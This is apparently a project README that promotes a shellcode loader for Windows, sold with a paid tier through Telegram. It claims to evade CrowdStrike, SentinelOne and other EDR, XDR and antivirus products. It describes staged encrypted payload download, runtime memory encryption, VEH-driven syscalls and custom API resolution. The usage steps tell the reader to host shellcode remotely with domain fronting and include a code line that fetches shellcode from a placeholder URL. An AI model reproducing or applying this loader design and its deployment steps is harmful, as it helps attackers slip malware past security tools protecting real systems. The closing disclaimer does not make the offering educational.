- CURRENTLY BYPASSES CROWDSTRIKE & SENTINEL ONE RUNTIME.
- SCROLL DOWN TO FIND DETECTIONS (RUNTIME & STATIC TIME ANALYSIS)
- Want paid version? contact me at : https://t.me/codepulze
- Join our Discord server!
This project provides an advanced shellcode loader capable of bypassing major EDRs (Endpoint Detection and Response), XDRs, and AV (Antivirus) systems. The shellcode is executed in a staged manner with techniques such as memory protection manipulation, VEH (Vectored Exception Handling), and system calls to evade detection.
- Staged Shellcode Execution: Downloads and executes shellcode in multiple steps to minimize detection.
- Custom Memory Protection: Evading modern AntiVirus memory scanners by encrypting a function during runtime, then decrypting it when the function needs to be executed, then re-encrypting the function once the function has finished executing
- Vectored Exception Handling (VEH): Handles memory access violations and redirects execution flow.
- Encrypted Shellcode: Shellcode is encrypted during download and decrypted in-memory before execution.
- Custom
GetProcessAddress
&GetModuleHandleW
- Windows Operating System (x64)
- Visual Studio or compatible C++ compiler
- Internet connection (for staged shellcode download)
- Clone the repository:
- Open the project in Visual Studio or your preferred C++ environment (i use vsc).
- Compile the project in Release mode for a production-ready executable.
- Host the shellcode binary on a remote server (e.g., Discord, AWS, or any public URL, works best with domain fronting).
- Update the shellcode URL in the
main
function:std::wstring url = L"https://your-hosted-url/shellcode.bin";
- Run the executable:
hack.exe
This tool is intended for educational and research purposes only. Misuse of this tool for malicious purposes is strictly prohibited and against the law. The author does not condone or support any illegal activity.
- https://redops.at/en/blog/syscalls-via-vectored-exception-handling#:~:text=What%20is%20meant%20by%20syscalls%20via%20vectored%20exception,a%20VEH%20function%20and%20deliberately%20throwing%20an%20exception.
- https://whiteknightlabs.com/2024/07/31/layeredsyscall-abusing-veh-to-bypass-edrs/
- https://github.com/C5Hackr/Segment-Encryption
- https://revers.engineering/custom-getprocaddress-and-getmodulehandle-implementation-x64/